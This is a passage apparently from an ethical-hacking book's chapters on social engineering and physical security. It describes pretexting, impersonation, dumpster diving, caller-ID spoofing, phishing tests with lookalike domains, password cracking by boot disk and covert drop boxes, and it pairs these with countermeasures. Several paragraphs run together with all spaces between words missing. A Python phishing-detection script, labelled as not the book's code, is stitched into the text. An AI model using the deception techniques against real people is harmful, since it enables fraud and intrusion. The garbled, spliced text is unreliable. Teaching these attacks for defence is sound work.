Ifanyoftheprecedinginformationisleaked,financiallosses,loweredemployeemorale,decreasedcustomerloyalty,andevenlegalandregulatorycomplianceissuescouldresult.Thepossibilitiesareendless.

Socialengineeringattacksaredifficulttoprotectagainstforvariousreasons.Foronething,theyaren’twelldocumented.Foranother,socialengineersarelimitedonlybytheirimaginations.Also,becausesomanypossiblemethodsexist,recoveryandprotectionaredifficultaftertheattack.Furthermore,thehard,crunchyoutsideoffirewallsandintrusionpreventionsystemsoftencreatesafalsesenseofsecurity,makingtheproblemevenworse.

Withsocialengineering,youneverknowthenextmethodofattack.Thebestthingsyoucandoaretoremainvigilant,understandthesocialengineer’smotivesandmethodologies,andprotectagainstthemostcommonattacksthroughongoingsecurityawarenessinyourorganization.Idiscusshowyoucandothisintherestofthischapter.

BuildingtrustTrust—sohardtogain,yetsoeasytolose.Trustistheessenceofsocialengineering.Mostpeopletrustothersuntilasituationforcesthemnotto.Peoplewanttohelponeanother,especiallyiftrustcanbebuiltandtherequestforhelpseemsreasonable.Mostpeoplewanttobeteamplayersintheworkplaceanddon’trealizewhatcanhappeniftheydivulgetoomuchinformationtoasourcewhoshouldn’tbetrusted.Thistrustallowssocialengineerstoaccomplishtheirgoals.Ofcourse,buildingdeeptrustoftentakestime.Craftysocialengineerscangainitwithinminutesorhours.Howdotheydoit?

Likability:Whocan’trelatetoaniceperson?Everyonelovescourtesy.Thefriendliersocialengineersare—withoutgoingoverboard—thebettertheirchancesofgettingwhattheywant.Socialengineersoftenbegintobuildarelationshipbyestablishingcommoninterests.Theyoftenusetheinformationtheygainintheresearchphasetodeterminewhatthevictimlikesandtopretendthattheylikethosethings,too.Theycanphonevictimsormeettheminpersonand,basedoninformationthesocialengineershavediscoveredabouttheperson,starttalkingaboutlocalsportsteamsorhowwonderfulitistobesingleagain.Afewlow-keyandwell-articulatedcommentscanbethestartofanicenewrelationship.Believability:Believabilityisbasedinpartontheknowledgesocialengineershaveandhowlikabletheyare.Socialengineersalsouseimpersonation—perhapsbyposingasnewemployeesorfellowemployeesthatthevictimhasn’tmet.Theymayevenposeasvendorswhodobusinesswiththeorganization.Theyoftenmodestlyclaimauthoritytoinfluencepeople.Themostcommonsocialengineeringtrickistodosomethingnicesothatthevictimfeelsobligatedtobeniceinreturnortobeateamplayerfortheorganization.

ExploitingtherelationshipAftersocialengineersobtainthetrustoftheirunsuspectingvictims,theycoaxthevictimsintodivulgingmoreinformationthantheyshould.Whammo—thesocialengineercangoinforthekill.Socialengineersdothisthroughface-to-faceorelectroniccommunicationthatvictimsfeelcomfortablewith,ortheyusetechnologytogetvictimstodivulgeinformation.

DeceitthroughwordsandactionsWilysocialengineerscangetinsideinformationfromtheirvictimsinmanyways.Theyareoftenarticulateandfocusonkeepingtheirconversationsmovingwithoutgivingtheirvictimsmuchtimetothinkaboutwhatthey’resaying.However,ifthey’recarelessoroverlyanxiousduringtheirsocialengineeringattacks,thefollowingtip-offsmightgivethemaway:

Acting overly friendly or eager

Mentioning names of prominent people within the organization
Bragging about authority within the organization
Threatening reprimands if requests aren't honored
Acting nervous when questioned (pursing the lips and fidgeting—especially the hands and feet, because controlling body parts that are farther from the face requires more conscious effort)
Overemphasizing details
Experiencing physiological changes, such as dilated pupils or changes in voice pitch
Appearing rushed
Refusing to give information
Volunteering information and answering unasked questions
Knowing information that an outsider should not have
Using insider speech or slang as a known outsider
Asking strange questions
Misspelling words in written communications

A good social engineer isn't obvious with the preceding actions, but these are some of the signs that malicious behavior is in the works. Of course, if the person is a sociopath or psychopath, your experience may vary. (Psychology For Dummies by Adam Cash is a good resource for such complexities of the human mind.)

Social engineers often do a favor for someone and then turn around and ask that person if he or she would mind helping them. This common social engineering trick works pretty well. Social engineers also often use what's called reverse social engineering. This is where they offer help if a specific problem arises; some time passes, the problem occurs (often by their doing), and then they help fix the problem—not unlike politicians in Washington, DC! They may come across as heroes, which can further their cause. Social engineers might ask an unsuspecting employee for a favor. Yes—they just outright ask for a favor. Many people fall for this trap.

Impersonating an employee is easy. Social engineers can wear a similar-looking uniform, make a fake ID badge, or simply dress like the real employees. People think, "Hey—he looks and acts like me, so he must be one of us." Social engineers also pretend to be employees calling from an outside phone line. This trick is an especially popular way of exploiting help desk and call center personnel. Social engineers know that these employees fall into a rut easily because their tasks are repetitive, such as saying, "Hello, can I get your customer number, please?"

Deceit through technology

Technology can make things easier—and more fun—for the social engineer. Often, a malicious request for information comes from a computer or other electronic entity that the victims think they can identify. But spoofing a computer name, an e-mail address, a fax number, or a network address is easy. Fortunately, you can take a few countermeasures against this type of attack, as described in the next section.

Hackers can deceive through technology by sending e-mail that asks victims for critical information. Such an e-mail usually provides a link that directs victims to a professional- and legitimate-looking website that "updates" such account information as user IDs, passwords, and Social Security numbers. They might also do this on social networking sites, such as Facebook and Myspace.

Many spam and phishing messages also use this trick. Most users are inundated with so much spam and other unwanted e-mail that they often let their guard down and open e-mails and attachments they shouldn't. These e-mails usually look professional and believable. They often dupe people into disclosing information they should never give in exchange for a gift. These social engineering tricks also occur when a hacker who has already broken into the network sends messages or creates fake Internet pop-up windows. The same tricks have occurred through instant messaging and cellphone messaging.

In some well-publicized incidents, hackers e-mailed their victims a patch purporting to come from Microsoft or another well-known vendor. Users think it looks like a duck and it quacks like a duck—but it's not the right duck! The message is actually from a hacker wanting the user to install the "patch," which installs a Trojan-horse keylogger or creates a backdoor into computers and networks. Hackers use these backdoors to hack into the organization's systems or use the victims' computers (known as zombies) as launching pads to attack another system. Even viruses and worms can use social engineering. For instance, the LoveBug worm told users they had a secret admirer. When the victims opened the e-mail, it was too late. Their computers were infected (and perhaps worse, they didn't have a secret admirer).

The Nigerian 419 e-mail fraud scheme attempts to access unsuspecting people's bank accounts and money. These social engineers—I mean scamsters—offer to transfer millions of dollars to the victim to repatriate a deceased client's funds to the United States. All the victim must provide is personal bank-account information and a little money up front to cover the transfer expenses. Victims then have their bank accounts emptied. This trap has been around for a while, and it's a shame that people still fall for it.

Many computerized social engineering tactics can be performed anonymously through Internet proxy servers, anonymizers, remailers, and basic SMTP servers that have an open relay. When people fall for requests for confidential personal or corporate information, the sources of these social engineering attacks are often impossible to track.

Performing Social Engineering Attacks

The process of social engineering is actually pretty basic. Generally, social engineers discover the details on people, organizational processes, and information systems to perform their attacks. With this information, they know what to pursue. Social engineering attacks are typically carried out in four simple steps:

1. Perform research.
2. Build trust.
3. Exploit relationships for information through words, actions, or technology.
4. Use the information gathered for malicious purposes.

These steps can include numerous substeps and techniques, depending on the attack being performed.

Before social engineers perform their attacks, they need a goal. This is the first step in these attackers' processes for social engineering, and this goal is most likely already implanted in their minds. What do they want to accomplish? What are the social engineers trying to hack? Why? Do they want intellectual property, server passwords, or is it access they desire? Or, do they simply want to prove that the company's defenses can be penetrated? In your efforts as a security professional performing social engineering, determine this overall goal before you begin. Otherwise, you'll just be wandering aimlessly, creating unnecessary headaches and risks for you and others along the way.

Seeking information

After social engineers have a goal in mind, they typically start the attack by gathering public information about their victim(s). Many social engineers acquire information slowly over time so they don't raise suspicion. Obvious information gathering is a tip-off when defending against social engineering. I mention other warning signs to be aware of throughout the rest of this chapter.

Regardless of the initial research method, all a criminal might need to penetrate an organization is an employee list, a few key internal phone numbers, the latest news from a social media website, or a company calendar. Chapter 5 covers more details on information gathering, but the following are worth calling out.

Using the Internet

Today's basic research medium is the Internet. A few minutes searching on Google or other search engines, using simple keywords, such as the company name or specific employees' names, often produces a lot of information. You can find even more information in SEC filings at www.sec.gov and at such sites as www.hoovers.com and http://finance.yahoo.com. Many organizations—especially their management—would be dismayed to discover the organizational information that's available online!

Given the plethora of such information, it's often enough to start a social engineering attack.

Criminals can pay just a few dollars for a comprehensive online background check on individuals, executives included. These searches turn up practically all public—and sometimes private—information about a person in minutes.

Dumpster diving

Dumpster diving is a little more risky—and it's certainly messy. But, it's a highly effective method of obtaining information. This method involves literally rummaging through trash cans for information about a company.

Dumpster diving can turn up even the most confidential of information because some people assume that their information is safe after it goes into the trash. Most people don't think about the potential value of the paper they throw away. And I'm not just talking about the recycle value! These documents often contain a wealth of information that can tip off the social engineer with information needed to penetrate the organization. The astute social engineer looks for the following hard-copy documents:

Internal phone lists
Organizational charts
Employee handbooks, which often contain security policies
Network diagrams
Password lists
Meeting notes
Spreadsheets and reports
Customer records
Printouts of e-mails that contain confidential information

Shredding documents is effective only if the paper is cross-shredded into tiny pieces of confetti. Inexpensive shredders that shred documents only in long strips are basically worthless against a determined social engineer. With a little time and tape, a savvy hacker can piece a document back together if that's what he's determined to do.

Hackers often gather confidential personal and business information from others by listening in on conversations held in restaurants, coffee shops, and airports. People who speak loudly when talking on their cellphones are also a great source of sensitive information for social engineers. (Poetic justice, perhaps?) Airplanes are a great place for shoulder surfing and gathering sensitive information. While I'm out and about in public places and on airplanes, I hear and see an amazing amount of private information. You can hardly avoid it!

The bad guys also look in the trash for USB drives, DVDs, and other media. See Chapter 7 for more on trash and other physical security issues, including countermeasures for protecting against dumpster divers.

Phone systems

Attackers can obtain information by using the dial-by-name feature built into most voicemail systems. To access this feature, you usually just press 0 or # after calling the company's main number or after you enter someone's voicemail box. This trick works best after hours to ensure no one answers.

Social engineers can find interesting bits of information, at times, such as when their victims are out of town, just by listening to voicemail messages. They can even study victims' voices by listening to their voicemail messages, podcasts, or webcasts so they can learn to impersonate those people.

Attackers can protect their identities if they can hide where they call from. Here are some ways they can hide their locations:

Residential phones sometimes can hide their numbers from caller ID by dialing *67 before the phone number. This feature isn't effective when calling toll-free numbers (800, 888, 877, 866) or 911.

Disposable cellphones and VoIP services work quite well, however.

Business phones in an office using a phone switch are more difficult to spoof. However, all the attacker usually needs is the user guide and administrator password for the phone switch software. In many switches, the attacker can enter the source number—including a falsified number, such as the victim's home phone number. VoIP servers such as the open source Asterisk (www.asterisk.org) can be used and configured to send any number they want.

Phishing e-mails

The latest, and often most successful, means for hacking is carried out via e-mail phishing, where criminals send bogus e-mails to potential victims in an attempt to get them to divulge sensitive information or click malicious links that lead to malware infections. Phishing has actually been around for years, but it has recently gained greater visibility given some high-profile exploits against seemingly impenetrable businesses and federal government agencies. Phishing's effectiveness is amazing, and the consequences are often ugly. I'm seeing success rates (or failure rates, depending on how you look at it) as high as 60–70 percent in my own phishing testing. A well-worded e-mail is all it takes to glean passwords, access sensitive information, or inject malware into targeted computers.

You can perform your own phishing exercises. A rudimentary, yet highly effective, method is to set up an e-mail account on your domain, or ideally, a domain that looks similar to yours at a glance, request information or link to a website that collects information, send e-mails to employees or other users you want to test, and see what they do. Do they open the e-mail, click the link, divulge information, or—if you're lucky—none of the above? It's really as simple as that.

Be it today's rushed world of business, general user gullibility, or downright ignorance, it's amazing how susceptible the average person is to phishing e-mail exploits. A good phishing e-mail that has a greater chance of being opened and responded to creates a sense of urgency and provides information that presumably only an insider would know. Beyond that, many phishing e-mails are easy to spot because they often:

Have typographical errors
Contain generic salutations and e-mail signatures
Ask the user to directly click on a link
Solicit sensitive information
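The tip-offs above turned into a defender-side filter, as an added example (not code from the book): it flags an e-mail body on each of the four signs and also on the bit.ly and ow.ly shortened links the user tips later in this chapter warn about. The word lists, the two-indicator cut-off and the two sample messages are constructed for illustration.

```python
"""Heuristic phishing tip-off scorer (added example, not the book's code).

Each check maps to one sign from the chapter: typographical errors, generic
salutations and signatures, a direct request to click a link, and solicitation
of sensitive information. Word lists and thresholds are constructed.
"""
import re

# Constructed list of misspellings that commonly appear in bogus e-mails.
MISSPELLINGS = {"recieve", "verifiy", "acount", "suspened", "imediately",
                "informations", "securty", "adress", "confrim"}
GENERIC_SALUTATIONS = ("dear customer", "dear valued customer", "dear user",
                       "dear account holder", "hello user")
GENERIC_SIGNATURES = ("support team", "security team", "customer service",
                      "it department")
CLICK_PHRASES = ("click here", "click the link", "click below", "click on")
SENSITIVE_TERMS = ("password", "social security", "ssn", "account number",
                   "credit card", "pin", "date of birth")
# Shorteners named in this chapter (bit.ly, ow.ly) plus constructed extras.
URL_SHORTENERS = {"bit.ly", "ow.ly", "tinyurl.com", "t.co"}

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)


def phishing_indicators(message):
    """Return the tip-offs (as short tags) that fire for one e-mail body."""
    body = message.lower()
    words = set(re.findall(r"[a-z']+", body))
    # Host part of every URL, with any :port stripped.
    hosts = [h.lower().split(":")[0] for h in URL_RE.findall(message)]
    hits = []
    if words & MISSPELLINGS:
        hits.append("typos")
    if any(s in body for s in GENERIC_SALUTATIONS):
        hits.append("generic_salutation")
    if any(s in body for s in GENERIC_SIGNATURES):
        hits.append("generic_signature")
    if hosts or any(p in body for p in CLICK_PHRASES):
        hits.append("asks_to_click_link")
    if any(h in URL_SHORTENERS for h in hosts):
        hits.append("shortened_url")
    # Word boundaries so that "pin" does not fire on "shopping" or "opinion".
    if any(re.search(r"\b" + re.escape(t) + r"\b", body) for t in SENSITIVE_TERMS):
        hits.append("solicits_sensitive_info")
    return hits


def is_probably_phishing(message, threshold=2):
    """True when at least `threshold` independent tip-offs fire (constructed cut-off)."""
    return len(phishing_indicators(message)) >= threshold


# Constructed sample messages for a stand-alone run.
PHISHING_SAMPLE = """Dear Valued Customer,
We have detected unusual activity on your acount. Please click the link
below within 24 hours to verifiy your password and Social Security number,
or your access will be suspened.
http://bit.ly/xyz123
Security Team"""

LEGIT_SAMPLE = """Hi Bob,
The Thursday budget meeting moved to 10am in room 4B. Agenda is in the
shared folder as usual. See you there.
Maria"""

if __name__ == "__main__":
    for name, msg in (("phishing", PHISHING_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(name, phishing_indicators(msg), is_probably_phishing(msg))
```

Run it over the bodies your mail gateway quarantines or that users report, and tune the lists to the wording your own campaigns use.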

A more formal means for executing your phishing tests is to use a tool made specifically for the job. There are commercial options available on the Internet such as LUCY (http://phishing-server.com) as well as freebies such as Simple Phishing Toolkit (https://github.com/sptoolkit/sptoolkit), which is no longer supported but can still be used for this type of testing. With both options, you have access to pre-installed e-mail templates, the ability to scrape (copy pages from) live websites so you can customize your own campaign, and various reporting capabilities so you can track which e-mail users are taking the bait and failing your tests.

Social Engineering Countermeasures

You have only a few good lines of defense against social engineering. Social engineering will put your layered defenses to the true test. Even with strong security controls, a naïve or untrained user can let the social engineer into the network. Never underestimate the power of social engineers—and that of your users in helping them get their way.

Policies

Specific policies help ward off social engineering in the long term in the following areas:

Classifying information so that users don't have access to certain levels of information they don't need
Setting up user IDs when hiring employees or contractors
Establishing acceptable computer usage that employees agree to in writing
Removing user IDs for employees, contractors, and consultants who no longer work for the organization
Setting and resetting strong passphrases
Responding quickly to security incidents, such as suspicious behavior and known malware infections
Properly handling proprietary and confidential information
Escorting guests around your building(s)

These policies must be enforceable and enforced for everyone within the organization. Keep them up-to-date, tell your users about them, and, most important, test them.

User awareness and training

One of the best lines of defense against social engineering is training employees to identify and respond to social engineering attacks. User awareness begins with initial training for everyone and follows with security awareness initiatives to keep social engineering defenses fresh in everyone's mind. Align training and awareness with specific security policies—you may also want to have a dedicated security training and awareness policy.

Consider outsourcing security training to a seasoned security trainer. Employees often take training more seriously if it comes from an outsider, similar to how a family member or spouse will ignore what you have to say but take the same words to heart if someone else says it. Outsourcing security training is worth the investment for that reason alone.

While you approach ongoing user training and awareness in your organization, the following tips can help you combat social engineering in the long term:

Treat security awareness and training as a business investment.
Train users on an ongoing basis to keep security fresh in their minds.
Include information privacy and security tasks and responsibilities in everyone's job descriptions.
Tailor your content to your audience whenever possible.
Create a social engineering awareness program for your business functions and user roles.
Keep your messages as nontechnical as possible.
Develop incentive programs for preventing and reporting incidents.
Lead by example.

Share the following tips with your users to help prevent social engineering attacks:

Never divulge any information unless you can validate that the people requesting the information need it and are who they say they are. If a request is made over the telephone, verify the caller's identity and call back.
Never click an e-mail link that supposedly loads a page with information that needs updating. This is especially true for unsolicited e-mails and can be especially tricky on mobile devices, where users don't have the benefit of seeing where the link takes them in many cases. Encourage your users to validate shortened URLs from bit.ly, ow.ly, etc., if they're unsure about their safety or legitimacy. Various websites such as www.checkshorturl.com and http://wheredoesthislinkgo.com offer this service.
Be careful when sharing personal information on social networking sites, such as Facebook or LinkedIn. Also, be on the lookout for people claiming to know you or wanting to be your friend. Their intentions might be malicious.
Escort all guests within the building.
Never open e-mail attachments or other files from strangers.
Never give out passwords or other sensitive information.

A few other general suggestions can ward off social engineering:

Never let a stranger connect to one of your network jacks or internal wireless networks—even for a few seconds. Someone with ill intent can place a network analyzer, install malware, or otherwise set up a backdoor that can be remotely accessed when they leave.
Classify your information assets, both hard copy and electronic. Train all employees how to handle each asset type.
Develop and enforce computer media and document destruction policies that help ensure data is handled carefully and stays where it should be. A good resource for information on destruction policies is www.pdaconsulting.com/datadp.htm.
Use cross-shredding paper shredders. Better still, hire a document-shredding company that specializes in confidential document destruction.

The following techniques can reinforce the content of formal training:

New employee orientation, training lunches, e-mails, and newsletters
Social engineering survival brochure with tips and FAQs
Trinkets, such as screensavers, mouse pads, sticky notes, pens, and office posters that bear messages that reinforce security principles

The Appendix lists my favorite security awareness trinkets and tool vendors to improve security awareness and education in your organization.

Chapter 7

Physical Security

In This Chapter

Understanding the importance of physical security

Looking for physical security vulnerabilities

Implementing countermeasures for physical security attacks

I strongly believe that information security is more dependent on nontechnical policies and business processes than on the technical hardware and software solutions that many people and vendors swear by. Physical security, which is the protection of physical property, encompasses both technical and nontechnical components, both of which must be addressed.

Physical security is an often-overlooked but critical aspect of an information security program. Your ability to secure your information depends on your ability to physically secure your office, building, or campus. In this chapter, I cover some common physical security weaknesses as they relate to computers and information security that you must seek out and resolve. I also outline free and low-cost countermeasures you can implement to minimize your business's physical vulnerabilities.

I don't recommend breaking and entering, which would be necessary to test certain physical security vulnerabilities fully. Instead, approach those areas to see how far you can get. Take a fresh look—from an outsider's perspective—at the physical vulnerabilities covered in this chapter. You might discover holes in your physical security infrastructure that you had previously overlooked.

Identifying Basic Physical Security Vulnerabilities

Whatever your computer- and network-security technology, practically any hack is possible if an attacker is in your building or data center. That's why looking for physical security vulnerabilities and fixing them before they're exploited is so important.

In small companies, some physical security issues might not be a problem. Many physical security vulnerabilities depend on such factors as:

Size of the building
Number of buildings or office locations
Number of employees
Location and number of building entrance and exit points
Placement of server rooms, wiring closets, and data centers

Literally thousands of possible physical security weaknesses exist. The bad guys are always on the lookout for them—so you should look for these issues first. Here are some examples of physical security vulnerabilities I've found when performing security assessments for my clients:

No receptionist in a building to monitor who's coming and going
No visitor sign-in or escort required for building access
Employees overly trusting of visitors because they wear vendor uniforms or say they're in the building to work on the copier or computers
No access controls on doors, or the use of traditional keys that can be duplicated with no accountability
Doors propped open
IP-based video, access control, and data center management systems accessible via the network with vendor default user IDs and passwords
Publicly accessible computer rooms
Unsecured backup media such as tapes, hard drives, and CDs/DVDs
Sensitive information stored in hard-copy format lying around cubicles rather than being stored in locking filing cabinets
Unsecured computer hardware, especially routers, switches, and unencrypted laptops
Sensitive information being thrown away in trash cans rather than being shredded or placed in a shred container

When these physical security vulnerabilities are uncovered, bad things can happen. All it takes to exploit these weaknesses is an unauthorized individual entering your building.

Pinpointing Physical Vulnerabilities in Your Office

Many potential physical security exploits seem unlikely, but they can occur to organizations that don't pay attention to physical security risks. The bad guys can exploit many such vulnerabilities, including weaknesses in a building's infrastructure, office layout, computer-room access, and design. In addition to these factors, consider the facility's proximity to local emergency assistance (police, fire, and ambulance) and the area's crime statistics (burglary, breaking and entering, and so on) so you can better understand what you're up against.

Look for the vulnerabilities discussed in the following sections when assessing your organization's physical security. This won't take a lot of technical savvy or expensive equipment. Depending on the size of your office or facilities, these tests shouldn't take much time either. The bottom line is to determine whether the physical security controls are adequate given what's at stake. Above all, be practical and use common sense.

Building infrastructure

Doors, windows, and walls are critical components of a building—especially for a data center or an area where confidential information is stored.

Attack points

Criminals can exploit a handful of building infrastructure vulnerabilities. Consider the following commonly overlooked attack points:

Are doors propped open? If so, why?
Can gaps at the bottom of critical doors allow someone using a balloon or other device to trip a sensor on the inside of an otherwise "secure" room?
Would it be easy to force doors open? A simple kick near the doorknob is usually enough for standard doors.
What is the building or data center made of (steel, wood, concrete), and how sturdy are the walls and entryways? How resilient is the material to earthquakes, tornadoes, strong winds, heavy rains, and vehicles driving into the building? Would these disasters leave the building exposed so that looters and others with malicious intent could gain access to the computer room or other critical areas?
Are any doors or windows made of glass? Is this glass clear? Is the glass shatterproof or bulletproof?
Do door hinges on the outside make it easy for intruders to unhook them?
Are doors, windows, and other entry points wired to an alarm system?
Are there drop ceilings with tiles that can be pushed up?
Are the walls slab-to-slab? If not, someone could easily scale walls, bypassing any door or window access controls.

Countermeasures

Many physical security countermeasures for building vulnerabilities might require other maintenance, construction, or operations experts. If building infrastructure is not your forte, you can hire outside experts during the design, assessment, and retrofitting stages to ensure that you have adequate controls. Here are some of the best ways to solidify building security:

Strong doors and locks
Windowless walls around data centers
Signage that makes it clear what's where and who's allowed
A continuously monitored alarm system with network-based cameras located at all access areas
Lighting (especially around entry and exit points)
Mantraps and sallyports that allow only one person at a time to pass through a door
Fences (with barbed wire or razor wire if needed)

Utilities

You must consider building and data center utilities, such as power, water, generators, and fire suppression, when assessing physical security. These utilities can help fight off incidents and keep other access controls running during a power loss. You have to be careful, though, as they can also be used against you if an intruder enters the building.

Attack points

Intruders often exploit utility-related vulnerabilities. Consider the following attack points, which are commonly overlooked:

Is power-protection equipment (surge protectors, uninterruptible power supplies [UPSs], and generators) in place? How easily accessible are the on/off switches on these devices? Can an intruder walk in and flip a switch? Can an intruder simply scale a wood fence or cut off a simple lock and access critical equipment?
When the power fails, what happens to physical security mechanisms? Do they fail open, allowing anyone through, or fail closed, keeping everyone in or out until the power is restored?
Where are fire-detection and -suppression devices—including alarm sensors, extinguishers, and sprinkler systems—located? Determine how a malicious intruder can abuse them. Are they accessible via a wireless or local network with default login credentials? Perhaps they're accessible over the Internet? Are these devices placed where they can harm electronic equipment during a false alarm?
Where are water and gas shutoff valves located? Can you access them, or would you have to call maintenance personnel when an incident arises?
Are local telecom wires (both copper and fiber) that run outside of the building located aboveground, where someone can tap into them with telecom tools? Can digging in the area cut them easily? Are they located on telephone poles that are vulnerable to traffic accidents or weather-related incidents?

Countermeasures

You might need to involve outside experts during the design, assessment, or retrofitting stages. The key is placement:

Ensure that major utility controls are placed behind closed and lockable doors or fenced areas, out of sight to people passing through or nearby.
Ensure that any devices accessible over the network or Internet are tested using vulnerability scanners and other techniques I've outlined in this book. If they don't have to be network- or Internet-accessible, disable that feature or limit who can access the systems via firewall rules or a network access control list.
Ensure that someone walking through or near the building cannot access the controls to turn them on and off.

Security covers for on/off switches and thermostat controls, and locks for server power buttons, USB ports, and PCI expansion slots, can be effective defenses. Just don't depend on them fully, because someone with a hammer (or strong will) can easily crack them open.

I once assessed the physical security of an Internet colocation facility for a very large computer company. I made it past the front guard and tailgated through all the controlled doors to reach the data center. After I was inside, I walked by equipment that was owned by very large companies, such as servers, routers, firewalls, UPSs, and power cords. All this equipment was completely exposed to anyone walking in that area. A quick flip of a switch or an accidental trip over a network cable dangling to the floor could bring an entire shelf—and a global e-commerce system—to the ground.

Office layout and usage

Office design and usage can either help or hinder physical security.

Attack points

Intruders can exploit various weaknesses around the office. Consider these attack points:

Does a receptionist or security guard monitor traffic in and out of the main doors of the building?
Do employees have confidential information on their desks? What about mail and other packages—do they lie around outside someone's door or, even worse, outside the building, waiting for pickup?

Where are trash cans and dumpsters located? Are they easily accessible by anyone? Are recycling bins or shredders used?

Open recycling bins and other careless handling of trash are invitations for dumpster diving. People with ill intent often search for confidential company information and customer records in the trash—and they're often very successful! Dumpster diving can lead to many security exposures.

How secure are the mail and copy rooms? If intruders can access these rooms, they can steal mail or company letterhead to use against you. They can also use and abuse your fax machine(s), assuming you still have those!
Are closed-circuit television (CCTV) or IP-based network cameras used and monitored in real time? If your setup is less proactive and more as-needed, are you confident that you'll be able to quickly access videos and related logs when you need them? Have your network cameras and digital video recorders (DVRs) been hardened from attack—or at least have the default login credentials been changed? This is a security flaw that you can predict with near 100-percent certainty on practically all types of networks, from public utility companies to hospitals to manufacturing companies and all types of businesses in between.

What access controls are on doors? Are regular keys, card keys, combination locks, or biometrics used? Who can access these keys, and where are they stored?

Keys and programmable keypad combinations are often shared among users, making accountability difficult to determine. Find out how many people share these combinations and keys.

I once came across a situation for a client where the front lobby entrance was unmonitored. It also happened to have a Voice over IP (VoIP) phone available for anyone to use. But the client did not consider that anyone could enter the lobby, disconnect the VoIP phone (or use the phone's data port), plug a laptop computer into the connection, and have full access to the network with minimal chance that the intruder would ever be questioned about what he or she was doing. This type of situation is easily prevented by disabling network connections in unmonitored areas (if separate data and voice ports are used, or if the voice and data traffic has been separated at the switch or physical network level).

Countermeasures

What's challenging about physical security is the fact that security controls are often reactive. Some controls are preventive (that is, they deter, detect, or delay), but they're not foolproof. Putting simple measures, such as the following, in place can help reduce your exposure to building and office-related vulnerabilities:

A receptionist or a security guard who monitors people coming and going. This is the simplest countermeasure. This person can ensure that every visitor signs in and that all new or untrusted visitors are always escorted.

Make it policy and procedure for all employees to question strangers and report strange behavior in the building.

Employees Only or Authorized Personnel Only signs show the bad guys where they should go instead of deterring them from entering. It's security by obscurity, but not calling attention to the critical areas may be the best approach.

Single entry and exit points to a data center.
Secure areas for dumpsters.
CCTV or IP-based video cameras for monitoring critical areas, including dumpsters.
Cross-cut shredders or secure recycling bins for hard-copy documents.

Limited numbers of keys and passcode combinations, with their usage logged and monitored.

Make keys and passcodes unique for each person whenever possible or, better yet, don't use them at all. Use electronic badges that can be better controlled and monitored instead.

Biometric identification systems can be very effective, but they can also be expensive and difficult to manage.

Network components and computers

After intruders obtain physical access to a building, they might look for the server room and other easily accessible computer and network devices.

Attack points

The keys to the kingdom are often as close as someone's desktop computer and not much farther than an unsecured computer room or wiring closet.

Intruders can do the following:

Obtain network access and send malicious e-mails as a logged-in user.
Crack and obtain passwords directly from the computer by booting it with a tool such as the ophcrack LiveCD (http://ophcrack.sourceforge.net). I cover this tool and more password hacks in Chapter 8.
Place penetration drop boxes such as those made by Pwnie Express (https://www.pwnieexpress.com) in a standard power outlet. These devices allow a malicious intruder to connect back into the system via cellular connection to perform their dirty deeds. This is a really sneaky (spy-like) means for intrusion that you can use as part of your own security testing.
Steal files from the computer by copying them to a removable storage device (such as a phone or USB drive) or by e-mailing them to an external address.
Enter unlocked computer rooms and mess around with servers, firewalls, and routers.
Walk out with network diagrams, contact lists, and disaster recovery plans.
Obtain phone numbers from analog lines and circuit IDs from T1, Metro Ethernet, and other telecom equipment to use in subsequent attacks.

Practically every bit of unencrypted information that traverses the network can be recorded for future analysis through one of the following methods:

Connecting a computer running network analyzer software (including a tool such as Cain and Abel, which I cover in Chapter 9) to a switch on your network.

Installing network analyzer software on an existing computer.

A network analyzer is very hard to spot. I cover network analyzers capturing packets on switched Ethernet networks in more detail in Chapter 9.

How would someone access or use this information in the future?

The easiest attack method is to install remote-administration software on the computer, such as VNC (www.realvnc.com). A crafty hacker with enough time can bind a public IP address to the computer if the computer is outside the firewall. Hackers or malicious insiders with enough network knowledge (and time) can configure new firewall rules to do this.

Also, consider these other physical vulnerabilities:

How easily can computers be accessed during regular business hours? During lunchtime? After hours?
Are computers—especially laptops—secured to desks with locks? Are their hard drives encrypted in the event one is lost or stolen? Do their screens lock after a short period of non-use?
Do employees typically leave their phones and tablets lying around unsecured? What about when they're traveling or working from home, hotels, or the local coffee shop?
Are passwords stored on sticky notes on computer screens, keyboards, or desks? This is a long-running joke in our circles, but it still happens!
Are backup media lying around the office or data center, susceptible to theft?

Are safes used to protect backup media? Are they specifically rated for media to keep backups from melting during a fire? Who can access the safe?

Safes are often at great risk because of their size and value. Also, they are typically unprotected by the organization's regular security controls. Are specific policies and technologies in place to help protect them? Are locking laptop bags required? What about power-on passwords? Encryption can solve a lot of physical security-related weaknesses.

Howeasilycansomeoneconnecttoawirelessaccesspoint(AP)signalortheAPitselftojointhenetwork?Rogueaccesspointsarealsosomethingtoconsider.IcoverwirelessnetworksinmoredetailinChapter10.Arenetworkfirewalls,routers,switches,andhubs(basically,anythingwithanEthernetconnection)easilyaccessible,whichwouldenableanattackertoplugintothenetworkeasily?

AreallcablespatchedthroughonthepatchpanelinthewiringclosetsoallnetworkdropsareliveasinthecaseoftheunmonitoredlobbyareaImentionearlier?

Thisset-upisverycommonbutabadideabecauseitallowsanyonetoplugintothenetworkanywhereandgainaccess.Thisisnotonlyagreatwaytoallowintrudersontoyournetworkbutitcanalsobeusedasameansforspreadingmalware.

CountermeasuresNetworkandcomputersecuritycountermeasuresaresomeofthesimplesttoimplementyetthemostdifficulttoenforcebecausetheyinvolvepeopleandtheireverydayactions.Here’sarundownofthesecountermeasures:

Makeyourusersawareofwhattolookoutforsoyouhaveextrasetsofeyesandearshelpingyouout.Requireuserstolocktheirscreens—whichonlytakesafewclicksorkeystrokes—whentheyleavetheircomputers.Ensurethatstrongpasswordsareused.IcoverthistopicinChapter8.Requirelaptopuserstolocktheirsystemstotheirdeskswithalockingcable.Thisisespeciallyimportantforremoteworkersandtravelersaswellasinlargercompaniesorlocationsthatreceivealotoffoottraffic.

